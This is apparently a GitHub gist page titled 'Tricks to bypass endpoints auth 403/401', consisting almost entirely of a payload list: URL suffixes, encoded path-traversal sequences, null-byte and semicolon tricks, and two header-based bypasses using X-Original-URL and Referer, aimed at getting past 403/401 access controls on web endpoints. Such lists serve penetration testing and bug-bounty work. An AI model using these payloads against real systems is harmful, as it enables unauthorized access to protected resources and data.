Created
October 17, 2020 08:13
-
-
Save ricsirigu/cc5addff0121393eaf83f8258e70c21e to your computer and use it in GitHub Desktop.
Tricks to bypass endpoints auth 403/401
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Payloads for basic tests | |
? | |
?? | |
& | |
# | |
% | |
%20 | |
%09 | |
/ | |
/..;/ | |
../ | |
..%2f | |
..;/ | |
../ | |
\..\.\ | |
.././ | |
..%00/ | |
..%0d/ | |
..%5c | |
..\ | |
..%ff/ | |
%2e%2e%2f | |
.%2e/ | |
%3f | |
%26 | |
%23 | |
.json | |
HTTP Header based bypass | |
1. X-Original-URL: /redacted | |
2. Referer: https://site.com/api/redacted | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment